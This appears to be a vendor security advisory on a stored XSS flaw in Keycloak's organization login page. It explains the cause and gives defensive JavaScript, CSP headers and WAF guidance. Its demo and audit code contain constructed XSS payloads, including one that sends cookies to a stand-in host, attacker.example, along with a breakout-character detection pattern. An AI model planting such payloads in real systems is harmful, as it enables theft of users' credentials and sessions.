CVE-2026-37980 Overview
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Keycloak's organization selection login page. An attacker who already holds manage-realm or manage-organizations administrative privileges in a realm can store a JavaScript payload that later executes in the browsers of ordinary users when they use that realm's login page.
The vulnerability exists because the organization.alias value is placed directly into an inline JavaScript onclick handler without being escaped for that context. When a user clicks the affected organization entry, the attacker's script runs in the user's browser under the Keycloak server's origin, where it can capture credentials as they are typed, perform actions as that user, or redirect the user to a phishing page.
Critical Impact
Successful exploitation yields arbitrary JavaScript execution in the browser of any user who clicks the affected element on the realm's login page. The attacker must already hold manage-realm or manage-organizations rights in that realm, so the practical threat is a malicious or compromised administrator turning an admin-only setting into an attack on every end user of the realm. Whether session cookies can be read by the payload depends on their HttpOnly flag; credential capture on the login form and redirection to phishing pages do not depend on it.
Affected Products
- Keycloak (specific versions not disclosed in the advisory; the Organizations feature, and with it the affected page, exists only in Keycloak 25 and later, where it was introduced as a preview feature and became supported in Keycloak 26)
- Red Hat build of Keycloak and other downstream distributions that ship the Organizations feature (the legacy Red Hat Single Sign-On 7.x line is based on Keycloak 18 and has no organization selection page)
- Downstream products utilizing Keycloak authentication with organizations enabled
Discovery Timeline
- April 14, 2026 - CVE-2026-37980 published to NVD
- April 14, 2026 - Last updated in NVD database
Technical Details for CVE-2026-37980
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) stems from improper neutralization of user-controlled input in web page generation. The vulnerability resides in Keycloak's organization selection functionality on the login page, where the organization.alias field is embedded directly into an inline JavaScript onclick event handler.
When an administrator with manage-realm or manage-organizations privileges creates or modifies an organization, they can inject a malicious JavaScript payload into the alias field. This payload is stored in the Keycloak database and subsequently rendered to any user who accesses the login page for that realm, executing the attacker's script in the victim's browser context.
The attack requires elevated administrative privileges to plant the payload, but the impact lands on every user who subsequently clicks the poisoned entry on the login page. This is why the CVSS scope is rated Changed: the vulnerable component is administrator-managed realm configuration, while the resource that gets compromised is the end user's browser session, which lies outside that component's security authority.
Root Cause
The root cause is missing output encoding for the JavaScript context when the organization.alias value is rendered. The alias is concatenated directly into an onclick handler attribute without JavaScript string escaping, so a single quote or backslash in the value terminates the string literal and the remainder of the alias is parsed as code. HTML entity encoding alone would not be a fix: browsers decode character references in an attribute value before handing it to the JavaScript parser, so an encoded quote still ends the literal. The value must be escaped for the JavaScript string context and then HTML-encoded for the attribute, or, better, the inline handler should be replaced by a data attribute that a separate script reads, so attacker-controlled text is never parsed as code.
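To make the context mismatch concrete, the following is an added example in JavaScript, not Keycloak's code: the button markup, the selectOrganization() handler, the cookie value and the payload are hypothetical stand-ins for the organization selection page. It renders the same alias three ways, reproduces the browser's decoding of the attribute value, and then executes the resulting handler body with stubbed globals, so the difference between HTML-only escaping and proper JavaScript-string escaping is visible in what actually gets called.

```javascript
// Added example, not Keycloak's code: the markup, selectOrganization() and the
// cookie value are hypothetical stand-ins for the organization selection page.

// What a template engine's HTML auto-escaping does to an attribute value.
function htmlAttrEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal escaping: every character that could end the
// literal, the attribute or a <script> element becomes a \uXXXX sequence,
// which HTML decoding leaves untouched.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>&\u2028\u2029\r\n\t\0]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Browsers decode character references in an attribute value before the
// JavaScript parser sees it; this reproduces that step for the references
// htmlAttrEscape emits plus numeric ones.
function decodeAttrValue(attr) {
  return attr
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(Number(d)))
    .replace(/&quot;/g, '"').replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Three ways of rendering the same alias into an inline handler.
function renderRaw(alias) {          // the bug: alias concatenated as-is
  return `<button onclick="selectOrganization('${alias}')">`;
}
function renderHtmlEscaped(alias) {  // HTML-escaped only: still exploitable
  return `<button onclick="selectOrganization('${htmlAttrEscape(alias)}')">`;
}
function renderJsEscaped(alias) {    // JS-escaped, then HTML-escaped: safe
  return `<button onclick="selectOrganization('${htmlAttrEscape(jsStringEscape(alias))}')">`;
}
// Preferable: no inline handler at all. The alias is plain data in an
// attribute and a separate script attaches the click listener, so the value
// is never parsed as code (this form also works under a CSP without 'unsafe-inline').
function renderDataAttribute(alias) {
  return `<button class="org" data-alias="${htmlAttrEscape(alias)}">`;
}

// Extract the handler body exactly as the JavaScript engine would receive it.
function handlerSource(markup) {
  const m = /onclick="([^"]*)"/.exec(markup);
  return m ? decodeAttrValue(m[1]) : null;
}

// Run the handler body with stubbed globals and record every call it makes.
function runHandler(markup) {
  const calls = [];
  const fakeDocument = { cookie: 'session=constructed-value' }; // constructed stand-in
  new Function('selectOrganization', 'alert', 'document', handlerSource(markup))(
    (alias) => calls.push(['selectOrganization', alias]),
    (msg) => calls.push(['alert', msg]),
    fakeDocument,
  );
  return calls;
}

// Constructed payload in the style the advisory describes: close the string
// and the call, append attacker code, comment out the rest of the handler.
const PAYLOAD = "acme');alert(document.cookie);//";

const RENDERINGS = {
  raw: renderRaw(PAYLOAD),
  htmlOnly: renderHtmlEscaped(PAYLOAD),
  jsEscaped: renderJsEscaped(PAYLOAD),
};

for (const [name, markup] of Object.entries(RENDERINGS)) {
  console.log(name, JSON.stringify(runHandler(markup)));
}
```

Running it shows that the raw and the HTML-escaped renderings both call selectOrganization('acme') and then alert() with the cookie value, while the JavaScript-escaped rendering makes a single selectOrganization() call whose argument is the entire payload as inert text. The data-attribute form is the one to aim for in a theme: it keeps the alias out of any script context and does not need 'unsafe-inline' in the Content Security Policy.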
Attack Vector
An attacker with administrative privileges (manage-realm or manage-organizations) can exploit this vulnerability through the following mechanism:
- The attacker authenticates to Keycloak with an account possessing administrative privileges over realm or organization management
- The attacker creates or modifies an organization, injecting a crafted JavaScript payload into the organization.alias field
- The malicious payload is stored in the Keycloak database
- When any user visits the login page containing the organization selector, the payload is rendered within an inline onclick handler
- User interaction with the affected element triggers JavaScript execution in the victim's browser context
The malicious payload could be designed to capture credentials typed into the login form, perform actions on behalf of the user, redirect users to phishing pages, or read cookies that are not marked HttpOnly. For additional technical details, refer to the Red Hat CVE-2026-37980 Advisory and Red Hat Bug #2455325 Report.
Detection Methods for CVE-2026-37980
Indicators of Compromise
- Organization aliases in the Keycloak database or admin API output that contain JavaScript rather than a short identifier
- Organization aliases containing characters that can terminate a JavaScript string or HTML attribute, above all ', " and \, followed by ( ) ; / < > or the javascript: scheme; an alias is normally a short, URL-safe identifier, so anything outside your naming convention deserves a look
- Unexpected network requests originating from users' browsers during login page interactions
- Reports of suspicious browser behavior or redirects when accessing Keycloak login pages
Detection Strategies
- Use Content Security Policy as a detector as well as a blocker: start with Content-Security-Policy-Report-Only plus a report-uri/report-to endpoint so inline-script violations on the login page are reported without breaking the page, then enforce the policy once the page works under it
- Enable Keycloak admin events for the realm (Realm settings > Events > Admin events settings, with "Include representation") and alert on CREATE and UPDATE operations on organizations; the saved representation carries the alias, so a planted payload appears in the audit record itself
- Put WAF XSS rules on the admin API paths where the payload is written (POST and PUT to /admin/realms/<realm>/organizations), not only on responses, because the login page returns the stored payload as markup that looks legitimate to a response filter
- Periodically audit organization aliases, through the admin console or the admin REST API rather than by reading the database directly, against the naming convention your aliases are expected to follow
Monitoring Recommendations
- Enable verbose logging for administrative actions within Keycloak realms and organizations
- Configure alerting for unusual patterns in organization alias modifications
- Implement browser-side monitoring through SentinelOne's browser extension capabilities to detect XSS execution attempts
- Review authentication logs for anomalous session behavior that may indicate successful exploitation
How to Mitigate CVE-2026-37980
Immediate Actions Required
- Audit all existing organization aliases in affected Keycloak instances for content that does not look like a plain identifier, in every realm that has organizations enabled
- Review administrative access to identify accounts with manage-realm or manage-organizations privileges and verify their legitimacy
- Implement Content Security Policy headers with strict inline script restrictions as a defense-in-depth measure
- Consider temporarily restricting organization management capabilities until patches are applied
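The periodic audit in the detection strategies and the alias review in the immediate actions above are the same job, so here is one added example (not Keycloak's own tooling) that does it: a Node.js script that pulls organizations through the admin REST API and flags any alias outside an allowlisted naming convention, reporting the offending characters and whether any of them could break out of a JavaScript string. Assumptions: the admin endpoint GET /admin/realms/{realm}/organizations with first/max paging, a bearer token permitted to read organizations (supplied via the hypothetical KEYCLOAK_URL, KEYCLOAK_REALM and KEYCLOAK_TOKEN environment variables), and an alias convention of letters, digits, '.', '_' and '-', which you should adjust to your own rule. Without the environment variables it runs against constructed sample data.

```javascript
// Added example, not Keycloak's own tooling. Assumptions: the admin REST
// endpoint GET /admin/realms/{realm}/organizations with first/max paging, a
// bearer token allowed to read organizations, and an alias convention of
// letters, digits, '.', '_' and '-' (ALIAS_ALLOWLIST; adjust to your naming rule).

const ALIAS_ALLOWLIST = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;
const ALLOWED_CHAR = /[A-Za-z0-9._-]/;

// Characters that can terminate a JavaScript string, an HTML attribute or a
// statement; reported separately so a triager sees why an alias was flagged.
const BREAKOUT_CHARS = new Set([
  "'", '"', '\\', '<', '>', '&', '(', ')', ';', '/', '\n', '\r', '\u2028', '\u2029',
]);

// Returns one finding per alias outside the convention, with the offending
// characters and whether any of them could break out of a JS string context.
function findSuspiciousAliases(orgs) {
  const findings = [];
  for (const org of orgs) {
    const alias = typeof org.alias === 'string' ? org.alias : '';
    if (ALIAS_ALLOWLIST.test(alias)) continue;
    const offending = [...new Set([...alias].filter((c) => !ALLOWED_CHAR.test(c)))];
    findings.push({
      id: org.id,
      name: org.name,
      alias,
      offending,
      breakout: offending.some((c) => BREAKOUT_CHARS.has(c)),
    });
  }
  return findings;
}

// Pages through the admin API; needs Node 18+ for the global fetch.
async function fetchOrganizations({ baseUrl, realm, token, pageSize = 100 }) {
  const base = `${baseUrl.replace(/\/+$/, '')}/admin/realms/${encodeURIComponent(realm)}/organizations`;
  const all = [];
  for (let first = 0; ; first += pageSize) {
    const res = await fetch(`${base}?first=${first}&max=${pageSize}`, {
      headers: { Authorization: `Bearer ${token}` },
    });
    if (!res.ok) throw new Error(`${base}: HTTP ${res.status}`);
    const page = await res.json();
    all.push(...page);
    if (page.length < pageSize) return all;
  }
}

function formatFinding(f) {
  return `org ${f.id} name=${JSON.stringify(f.name)} alias=${JSON.stringify(f.alias)} ` +
    `offending=${JSON.stringify(f.offending)} breakout=${f.breakout}`;
}

// Constructed sample representations, not real data. Org 3 copies the display
// name of a legitimate org; only its alias gives it away.
const SAMPLE_ORGS = [
  { id: '1', name: 'Acme', alias: 'acme', enabled: true },
  { id: '2', name: 'Globex', alias: 'globex-eu', enabled: true },
  { id: '3', name: 'Acme', alias: "acme');fetch('https://attacker.example/?c='+document.cookie)//", enabled: true },
  { id: '4', name: 'Initech', alias: 'initech\u2028', enabled: true },
  { id: '5', name: 'Umbrella Corp', alias: 'Umbrella Corp', enabled: true },
];

(async () => {
  const orgs = process.env.KEYCLOAK_URL
    ? await fetchOrganizations({
        baseUrl: process.env.KEYCLOAK_URL,
        realm: process.env.KEYCLOAK_REALM,
        token: process.env.KEYCLOAK_TOKEN,
      })
    : SAMPLE_ORGS;
  for (const f of findSuspiciousAliases(orgs)) console.log(formatFinding(f));
})().catch((err) => { console.error(err.message); process.exitCode = 1; });
```

Aliases that merely violate the convention (a space, as in org 5) are listed with breakout=false so they can be cleaned up at leisure; anything with breakout=true should be treated as a potential planted payload and corrected through the admin console or API, with the admin event history for that organization pulled to identify which administrator account wrote it.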
Patch Information
Consult the Red Hat CVE-2026-37980 Advisory for official patch information and updated Keycloak versions that address this vulnerability. Monitor the Red Hat Bug #2455325 Report for ongoing remediation status and specific version details.
Organizations should prioritize applying vendor-provided security updates that implement proper input validation and output encoding for the organization.alias field.
Workarounds
- Send a strict Content Security Policy that prevents inline script execution (script-src 'self' without 'unsafe-inline'); test it in Report-Only mode first, because the organization selector's legitimate onclick handler is itself inline and will be blocked along with the malicious one, as may other inline scripts in your login theme
- Restrict administrative access by enforcing the principle of least privilege for the manage-realm and manage-organizations roles, and grant manage-organizations rather than manage-realm where organization administration is all that is needed
- Deploy a web application firewall (WAF) with XSS filtering rules in front of Keycloak, covering the admin API as well as the login pages
- Review existing organization aliases and correct suspicious ones through the admin console or admin REST API rather than by editing the database directly, so that Keycloak's caches and admin event history stay consistent with the stored data
# Example CSP header configuration for Apache/Nginx to mitigate XSS.
# Stage 1 is report-only (the /csp-report endpoint is a placeholder for your collector); stage 2 enforces.
# Keycloak can also send its own policy under Realm settings > Security defenses > Headers;
# when both the proxy and Keycloak send one, browsers enforce the intersection of the two.
# Apache httpd.conf or .htaccess
Header set Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self'; report-uri /csp-report"
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
# Nginx configuration
add_header Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self'; report-uri /csp-report" always;
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

